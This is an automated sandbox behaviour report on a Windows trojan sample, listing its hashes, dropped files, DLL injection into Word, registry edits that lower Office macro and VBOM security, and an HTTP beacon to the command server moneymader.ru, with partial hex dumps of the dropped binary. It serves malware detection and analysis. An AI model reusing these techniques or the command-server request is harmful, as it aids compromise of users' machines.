General Information

Analysis ID: 19541
Start time: 19:54:27
Start date: 09/09/2012
Overall analysis duration: 0h 6m 16s
Sample file name: New_password-1eb4cd066eb69b63e74387a82443d998.exe
Cookbook file name: Long Wait.jbs
Analysis system description: XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of analysed new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Warnings:
  • Too many NtAllocateVirtualMemory calls (excessive behavior)
  • Too many NtUserMessageCall calls (excessive behavior)

Classification / Threat Score

Persistence, Installation, Boot Survival :
Hiding, Stealthiness, Detection and Removal Protection :
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection :
Spreading :
Exploiting :
Networking :
Data spying, Sniffing, Keylogging, Ebanking Fraud :

Matching Signatures

Creates files inside the user directory
Creates temporary files
Printf formatting strings found in memory and binary data
Spawns processes
Urls found in memory or binary data
Creates an autostart registry key
Creates files inside the system directory
Creates mutexes \BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500Mutex \BaseNamedObjects\Local\Mutex_MSOSharedMem \BaseNamedObjects\Local\Mso97SharedDg20321106568_S-1-5-21-507921405-1960408961-839522115-500Mutex \BaseNamedObjects\Local\Mso97SharedDg19521106568_S-1-5-21-507921405-1960408961-839522115-500Mutex \BaseNamedObjects\3408630516cb2b92f4 \BaseNamedObjects\Local\SqmSysTray
Deletes itself after installation
Downloads files from webservers via HTTP
Drops PE files
PE file contains sections with non-standard names
PE sections with suspicious entropy found
Performs DNS lookups
Injects Dlls into Windows application C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp -> C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Maps a DLL or memory area into another process
Modifies Office VBOM (Visual Basic Object Model) security settings
Modifies Office macro security settings
Queues an APC in another process (thread injection)

Startup

  • system is xp
  • WINWORD.EXE (PID: 1680 MD5: 7A0FA3A0282B4630F3768A74441D4BAE)
    • svchost.exe (PID: 1744 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
  • cleanup

Created / dropped Files

File Path MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp 480AD1B1B4F71A6A1BE2F6FAC143A42A
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\VB11.pip 3D04C6263F770B2AD9A980043230EBBE
C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot 05A02048D6F36640223C02FE5E3F1D00
C:\WINDOWS\system32\hyli.igo 480AD1B1B4F71A6A1BE2F6FAC143A42A
C:\WINDOWS\system32\hyli.igo (copy) 480AD1B1B4F71A6A1BE2F6FAC143A42A

Contacted Domains

Name IP Name Server Active Registrar e-Mail
moneymader.ru 88.214.232.128 ns2.moneymader.ru ns1.moneymader.ru true unknown unknown

Contacted IPs

IP Country Pingable Open Ports
88.214.232.128 UNITED KINGDOM true 21 80
195.186.1.121 SWITZERLAND false
195.186.4.121 SWITZERLAND false

Static File Info

File type: PE32 executable (GUI) Intel 80386, for MS Windows
File name: New_password-1eb4cd066eb69b63e74387a82443d998.exe
File size: 42496
MD5: 1eb4cd066eb69b63e74387a82443d998
SHA1: a90832f0e6649426875d1916cfe606a042b354aa
SHA256: e52a9808521c1ed027c2c8bca232646f4634455a8b226c9812f1fe2fcd0a6d0f
SHA512: f4533d959b6c787a8a14370eb5f4ac5afffae47529838f65269206f48227e7fd778702736fa1928df902a165dc542b086ddf03f0fcb7fe02d8793d5f23812b71

Static PE Info

General
Entrypoint: 0x4010b0
Entrypoint Section: .text
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, NO_SEH
Time Stamp: 0x4C92075C [Thu Sep 16 12:02:36 2010 UTC]
TLS Callbacks:
Resources
Name RVA Size Type Language Country
RT_ICON 0xe518 0xea8 data English United States
RT_DIALOG 0xf3d8 0x2e data English United States
RT_GROUP_ICON 0xf3c0 0x14 MS Windows icon resource - 1 icon English United States
RT_VERSION 0xe190 0x14c 80386 COFF executable not stripped - version 79 English United States
RT_MANIFEST 0xe2e0 0x232 XML document text English United States
Imports
DLL Import
KERNEL32.dll GetModuleHandleA, GetProcAddress, GetCommandLineA, CloseHandle, VirtualAlloc, lstrcpyA, LoadLibraryA
Sections
Name Virtual Address Virtual Size Raw Size Entropy
.text 0x1000 0xc98 0xe00 5.60291887063
.data 0x2000 0x72d0 0x7400 5.44666449829
.data0 0xa000 0x18 0x200 0.322488410335
.data1 0xb000 0x18 0x200 0.335736224849
.data2 0xc000 0x18 0x200 0.322488410335
.data3 0xd000 0x18 0x200 0.322488410335
.rsrc 0xe000 0x1408 0x1600 5.4089687542
.reloc 0x10000 0x164 0x200 3.09199427013
Version Infos
Description Data
FileVersion 00.4.9.96
ProductVersion 8.69.82.36
Translation 0x0804 0x0000
Possible Origin
Language of compilation system Country where language is spoken Map
English United States

String Analysis

Formattings for printf style functions
String value Source
%SystemRoot%\System32\mswsock.dll svchost.exe
%s\%s\%s\%s\%s svchost.exe
|%SystemRoot%\system32\rsvpsp.dll svchost.exe
%v Omd "%u"(EyBdo w CU Vtxlqk) Cu Ootj hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr
Pw%n[w svchost.exe
%ls %ls svchost.exe
%SystemRoot%\Debug\UserMode\userenv.bak svchost.exe
%systemroot%\system32\com\dmp New_password-1eb4cd066eb69b63e74387a82443d998.exe
uxrfno38.hai %u cwknqw hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr
%s\%s\%s\%s\%s\%s svchost.exe
Assertion failed: %s, file %s, line %d New_password-1eb4cd066eb69b63e74387a82443d998.exe, svchost.exe
%d %d %d %d svchost.exe
%SystemRoot%\Debug\UserMode\userenv.log svchost.exe
IVO28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$OHQ55'Ah=J][6]2.`Q)@hUlM.?=m~Nj*ECtw0pl%6?*zSI?kbKH?q@[=1uvG8D)8DZ9=]3pfHL}{f97s]o?OVu@NuCskaR*]2b8'80pIMk?~~O9=KQ=l3 New_password-1eb4cd066eb69b63e74387a82443d998.exe
%SystemRoot%\system32\rsvpsp.dll svchost.exe
%systemroot%\Registration New_password-1eb4cd066eb69b63e74387a82443d998.exe
%SystemRoot%\System32\winrnr.dll svchost.exe
JHX /%u %u%v %s hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr
%SystemRoot%\system32\mswsock.dll svchost.exe
DragDrop%lx New_password-1eb4cd066eb69b63e74387a82443d998.exe, svchost.exe
URLs
String value Source
http://moneymader.ru/group/mixer/bb.php svchost.exe
http://office.bcentral.com/eservices/error?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
http://officeupdate.microsoft.com WINWORD.EXE
http://schemas.microsoft.com/sharepoint/soap/directory/ WINWORD.EXE
http://schemas.xmlsoap.org/soap/envelope/ WINWORD.EXE
http://www.w3.org/2001/xmlschema WINWORD.EXE
http://www.w3.org/2001/xmlschema-instance WINWORD.EXE
https://office.bcentral.com/eservices/index?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE
https://office.bcentral.com/eservices/service?command=webpost&dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE

Network Behavior

TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Sep 9, 2012 19:57:50.692679882 CEST 1039 80 192.168.0.10 88.214.232.128
Sep 9, 2012 19:57:50.692706108 CEST 80 1039 88.214.232.128 192.168.0.10
Sep 9, 2012 19:57:50.693042994 CEST 1039 80 192.168.0.10 88.214.232.128
Sep 9, 2012 19:57:50.693845034 CEST 1039 80 192.168.0.10 88.214.232.128
Sep 9, 2012 19:57:50.693859100 CEST 80 1039 88.214.232.128 192.168.0.10
Sep 9, 2012 19:57:51.466325998 CEST 80 1039 88.214.232.128 192.168.0.10
Sep 9, 2012 19:57:51.467135906 CEST 1039 80 192.168.0.10 88.214.232.128
Sep 9, 2012 19:57:51.467197895 CEST 80 1039 88.214.232.128 192.168.0.10
Sep 9, 2012 19:57:51.467570066 CEST 1039 80 192.168.0.10 88.214.232.128
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Sep 9, 2012 19:57:49.265110970 CEST 61120 53 192.168.0.10 195.186.1.121
Sep 9, 2012 19:57:50.264120102 CEST 61120 53 192.168.0.10 195.186.4.121
Sep 9, 2012 19:57:50.673702002 CEST 53 61120 195.186.4.121 192.168.0.10
Sep 9, 2012 19:57:50.761223078 CEST 53 61120 195.186.1.121 192.168.0.10
ICMP Packets
Timestamp Source IP Dest IP Checksum Code Type
Sep 9, 2012 19:57:50.761780977 CEST 192.168.0.10 195.186.1.121 832b (Port unreachable) Destination Unreachable
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Sep 9, 2012 19:57:49.265110970 CEST 192.168.0.10 195.186.1.121 0x2cd5 Standard query (0) moneymader.ru A (IP address) IN (0x0001)
Sep 9, 2012 19:57:50.264120102 CEST 192.168.0.10 195.186.4.121 0x2cd5 Standard query (0) moneymader.ru A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class
Sep 9, 2012 19:57:50.673702002 CEST 195.186.4.121 192.168.0.10 0x2cd5 No error (0) moneymader.ru 88.214.232.128 A (IP address) IN (0x0001)
Sep 9, 2012 19:57:50.761223078 CEST 195.186.1.121 192.168.0.10 0x2cd5 No error (0) moneymader.ru 88.214.232.128 A (IP address) IN (0x0001)
HTTP Request Dependency Graph
  • moneymader.ru
HTTP Packets
Timestamp Source Port Dest Port Source IP Dest IP Header Total Bytes Transfered (KB)
Sep 9, 2012 19:57:50.693845034 CEST 1039 80 192.168.0.10 88.214.232.128 GET /group/mixer/bb.php?v=200&id=436373810&b=16sentab&tm=24 HTTP/1.1
User-Agent: Opera\9.64Host: moneymader.ru
0
Sep 9, 2012 19:57:51.466325998 CEST 80 1039 88.214.232.128 192.168.0.10 HTTP/1.1 404 Not Found
Date: Sun, 09 Sep 2012 17:57:51 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
1

Code Manipulation Behavior

System Behavior

General
Start time: 09:39:48
Start date: 24/01/2012
Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x400000
File size: 42496 bytes
MD5 hash: 1EB4CD066EB69B63E74387A82443D998

File Activites

File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic write synchronous io non alert and non directory file true success or wait 1 40235C CreateFileA
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 1000116C CopyFileA
C:\WINDOWS\system32\hyli.igo read attributes and delete and synchronize and generic write sequential only and synchronous io non alert and non directory file true success or wait 1 1000116C CopyFileA
File Path Access Attributes Options Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp read attributes and synchronize and generic read normal synchronous io non alert and non directory file success or wait 1 4022D9 GetTempFileNameA
Old File Path New File Path Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp C:\WINDOWS\system32\hyli.igo success or wait 1 1000116C CopyFileA
File Path Offset Length Value Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 55 89 E5 53 83 EC 44 C6 45 F5 25 C6 45 F6 78 C6 45 F3 25 C6 45 F4 75 C6 45 F7 00 C7 44 24 0C F4 92 2B CB C7 44 24 08 F4 92 2B CB 8D 45 F3 89 44 24 04 8D 5D D3 89 1C 24 FF 15 8C 82 00 10 89 5C 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 FF 15 2C 82 00 10 83 EC 0C 89 C3 FF 15 7C 82 00 10 3D B7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 C7 04 24 0E 00 00 00 E8 50 21 00 00 84 C0 75 08 8D 65 F4 5B 5E 5F C9 C3 8B 1D EC 82 00 10 09 F3 8D BD A0 FD FF FF 89 7C 24 04 C7 04 24 0C 00 00 00 E8 4A 35 00 00 8B 15 8C 82 00 10 89 95 90 FD FF FF A1 EC 82 00 10 B1 64 D3 F8 89 FA 29 C2 89 D0 83 C0 64 89 44 24 04 C7 04 24 0B 00 00 00 E8 1C 35 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 E4 00 00 00 80 BD 87 EB FF FF 00 0F 84 C3 00 00 00 85 C0 7E 42 31 F6 EB 28 8D 76 00 A1 EC 82 00 10 B1 E8 D3 F8 89 DA 29 C2 01 D6 C7 04 24 E8 03 00 00 FF 15 80 82 00 10 51 39 B5 B4 EB FF FF 7E 16 E8 EE 17 00 00 83 F8 02 75 D1 A1 EC 82 00 10 8D 3C 85 02 00 00 00 83 FF 02 0F 84 AA 00 00 00 C7 04 24 01 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 B5 F0 FC FF FF B1 96 F3 A5 89 04 24 FF 15 6C 82 00 10 50 8D 85 48 FF FF FF 89 44 24 04 C7 04 24 00 00 00 00 E8 57 2D 00 00 8D 55 C8 89 54 24 08 C7 44 24 04 04 00 00 00 89 04 24 E8 BC FD FF FF C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 45 D8 00 00 00 00 C7 45 DC 00 00 00 00 8B 85 E0 FC FF FF 89 44 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 74 3A 39 F2 77 22 8D 41 04 8D 76 00 39 C2 76 0E 89 C1 80 39 3A 74 D1 8D 41 01 39 C2 77 F2 31 C0 5B 5E 5F C9 C3 8D 76 00 89 F0 66 90 40 80 38 2F 74 0C 39 C2 77 F6 8D 46 01 EB D1 90 89 F0 39 C2 76 F4 C6 00 00 8D 78 01 8A 40 01 3C 0D 74 21 3C 0A 74 1D 39 FA 76 DF 89 F9 8D 76 00 41 8A 01 3C 0D 74 0F 3C success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 89 04 24 FF 15 A8 82 00 10 83 EC 10 85 C0 74 66 01 C3 85 DB 7F 9A EB C9 84 C9 74 AD 89 F2 84 D2 75 07 BE 01 00 00 00 EB A0 47 74 B0 8D 45 E4 89 44 24 08 89 7C 24 04 8D 95 E0 F7 FF FF 89 14 24 E8 8B FB FF FF 85 C0 0F 85 3B 01 00 00 80 3F 3C 74 24 8B 55 14 C6 02 00 8D 85 E0 F7 FF FF 89 44 24 04 C7 04 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 5C 24 04 89 04 24 FF 15 C0 82 00 10 83 EC 24 8B 45 F4 8B 5D FC C9 C3 90 55 89 E5 57 56 53 81 EC AC 00 00 00 8B 75 0C 8B 7D 10 8B 45 08 89 04 24 E8 5B FF FF FF 89 C3 85 C0 74 61 85 FF 74 14 8D 85 68 FF FF FF 89 44 24 04 89 3C 24 E8 8B 1F 00 00 89 C6 8B 45 1C 89 44 24 14 8B 45 18 89 44 24 10 8B 45 14 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 24 FF 15 A8 82 00 10 83 EC 10 89 85 E4 F7 FF FF C6 84 05 E8 F7 FF FF 00 85 C0 7E 36 89 C2 4A 31 FF 31 F6 8D 85 E8 F7 FF FF 89 D9 89 F3 89 CE EB 12 8D 76 00 80 F9 0A 74 43 31 FF 31 DB 85 D2 74 0F 40 4A 8A 08 80 F9 0D 75 EA B3 01 85 D2 75 F1 89 F3 8B 55 08 C7 82 4C 09 00 00 00 00 00 00 89 1C 24 FF 15 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 C7 44 24 14 04 00 00 00 8D 55 08 89 54 24 10 C7 44 24 0C 04 00 00 00 89 5C 24 08 C7 44 24 04 00 00 00 00 89 04 24 E8 EC F7 FF FF 83 C4 24 5B C9 C3 66 90 55 89 E5 53 83 EC 34 C7 45 F4 00 00 00 00 C7 04 24 14 00 00 00 E8 66 17 00 00 89 C3 C7 04 24 12 00 00 00 E8 58 17 00 00 C7 44 24 14 04 00 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 10 75 E6 8B 45 08 C7 80 24 08 00 00 01 00 00 00 C7 80 48 08 00 00 00 00 00 00 C7 44 24 04 10 50 00 10 83 C0 14 89 04 24 FF 15 EC 81 00 10 83 EC 08 8B 55 08 80 7A 05 00 75 48 8B 82 24 08 00 00 EB 20 66 90 8B 5D 08 8B 83 24 08 00 00 89 C2 C1 E2 07 01 C2 80 7C 13 14 00 74 27 40 89 83 24 08 00 00 89 44 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 8B 55 0C 89 54 24 04 89 04 24 FF 15 FC 81 00 10 83 EC 08 85 C0 0F 94 C0 8D 65 F8 5E 5F C9 C3 90 55 89 E5 57 56 53 83 EC 6C 8B 55 0C 80 3A 3A 74 1F 3B 55 10 73 10 89 D6 8B 45 10 90 46 80 3E 3A 74 10 39 F0 77 F6 83 C4 6C 5B 5E 5F C9 C3 66 90 89 D6 39 75 10 76 EF A1 20 80 00 10 85 C0 74 E6 89 F7 29 D7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 E8 7B 0D 00 00 89 44 24 04 89 34 24 FF 95 64 FE FF FF 83 EC 08 8A 03 84 C0 0F 84 91 00 00 00 31 C9 8D 76 00 8D 50 D0 80 FA 09 77 0A 8D 14 89 0F BE C0 8D 4C 50 D0 43 8A 03 84 C0 75 E7 83 F9 77 7E 6E 8D 5D B0 89 5C 24 04 C7 04 24 1A 00 00 00 E8 2B 0D 00 00 8D 45 E0 89 44 24 20 8D 45 E4 89 44 24 1C C7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 51 04 00 00 A1 E0 81 00 10 E8 7A FA FF FF C7 04 24 88 13 00 00 FF 15 80 82 00 10 51 8D 4D E0 8D 55 E4 89 F8 E8 47 FB FF FF E9 19 FF FF FF 66 90 8D 45 A0 89 44 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 B9 01 00 00 00 BA 0E 00 00 00 8B 45 A8 E8 30 FA FF FF 85 C0 0F 85 6B FF FF FF 8B 45 A8 85 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 89 7C 24 0C C7 44 24 08 00 00 00 00 8B 85 64 FF FF FF 89 44 24 04 8B 02 89 04 24 89 95 5C FF FF FF E8 96 00 00 00 89 03 89 7C 24 04 8B 85 64 FF FF FF 89 04 24 E8 8A 05 00 00 83 EC 08 89 03 83 C3 04 8B 95 5C FF FF FF 83 C2 04 46 8B 85 60 FF FF FF 39 34 C5 20 52 00 10 7F A5 89 D6 FF 85 60 FF FF FF 83 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 84 C0 0F 84 70 01 00 00 8B 7D 0C C7 45 E8 00 00 00 00 66 90 FF 45 08 85 DB 0F 84 45 01 00 00 B8 61 00 00 00 31 D2 F7 75 EC 38 45 F3 0F 8D B6 00 00 00 66 90 B8 41 00 00 00 88 D9 D3 E8 38 45 F3 0F 8C CA 00 00 00 80 7D F3 5A 0F 8F C0 00 00 00 89 D8 B1 5A D3 E0 8D 48 5A 88 4D E7 BA 41 00 00 00 BE 41 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 AA BF 5B 1E C6 BA A6 BF 45 90 AB B0 F8 B4 B8 C4 C2 CB 2F 6E FC 95 89 D2 2A FE CE C9 95 D5 DC A1 D8 91 29 6B E9 DD D4 D0 30 E0 84 DD 91 CC DD B6 85 DD 39 30 B6 D2 D6 BF 88 6E ED F7 AB 5D 1B F2 9B 89 28 7B A8 CE C7 DD 45 FE 3D DC 82 83 D6 C4 00 90 40 00 00 00 00 00 00 00 00 00 00 00 00 00 04 70 00 10 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 4F 68 7A 67 6E 00 59 45 45 59 63 75 6E 6F 71 6A 77 00 44 66 67 67 75 76 56 48 52 50 00 74 79 6F 71 75 62 00 47 68 67 6E 63 75 65 20 4C 78 71 67 76 6B 72 6E 20 77 79 6E 73 75 61 00 25 76 20 4F 6D 64 20 22 25 75 22 28 45 79 42 64 6F 20 77 20 43 55 20 56 74 78 6C 71 6B 29 20 43 75 20 4F 6F 74 6A 0D success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 00 00 00 36 3F 91 4C 00 00 00 00 6E 90 00 00 01 00 00 00 07 00 00 00 07 00 00 00 28 90 00 00 44 90 00 00 60 90 00 00 9C 10 00 00 E0 10 00 00 E8 10 00 00 F4 15 00 00 0C 16 00 00 D8 16 00 00 70 15 00 00 78 90 00 00 80 90 00 00 8A 90 00 00 95 90 00 00 9C 90 00 00 A3 90 00 00 AA 90 00 00 00 00 01 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 10 00 00 A8 00 00 00 3A 30 53 30 5E 30 75 30 92 30 A9 30 BF 30 FA 30 16 31 40 31 46 31 75 31 87 31 93 31 99 31 C3 31 D0 31 DE 31 E4 31 08 32 0E 32 2F 32 51 32 69 32 72 32 BB 32 E3 32 37 33 5C 33 78 33 8A 33 E4 33 1A 34 38 34 43 34 98 34 AD 34 D7 34 EC 34 F8 34 06 35 93 35 AA 35 B1 35 C0 35 C6 35 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 0 unknown success or wait 1 4018C9 WriteFile
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit AF0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit AF0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown AF0000 262144 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit B30000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image B30000 2904064 own pid read write conflicting addresses 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute and extend size commit 3F0000 24576 own pid readonly success or wait 1
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1 40111F
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1 40111F
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1 40111F
unknown query and write and read commit 400000 0 own pid execute and read and write access denied 1 351410
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1 351471
\NLS\NlsSectionCType read unknown 390000 12288 own pid readonly success or wait 1 351471
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp write and read and execute commit 3A0000 24576 own pid execute success or wait 1 401949
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp query and write and read and execute image 10000000 49152 own pid read write success or wait 1 401949
\KnownDlls\user32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1 100043DD
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3A0000 110592 own pid execute success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3A0000 110592 own pid execute success or wait 1 100043DD
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1 100043DD
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 100043DD
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 100043DD
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 100043DD
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1 100043DD
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1 100043DD
\KnownDlls\oleaut32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 100043DD

Registry Activites

Key Path Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security success or wait 1 10003C9C RegCreateKeyExA
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Level dword 1 success or wait 1 10003DA8 RegSetValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security AccessVBOM dword 1 success or wait 1 10003E06 RegSetValueExA
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security Level dword 1 4 success or wait 1 10003DA8 RegSetValueExA
HKEY_USERS\Software\Microsoft\Office\11.0\Word\Security AccessVBOM dword 1 0 success or wait 1 10003E06 RegSetValueExA
Key Path Name Completion Count Source Address Symbol
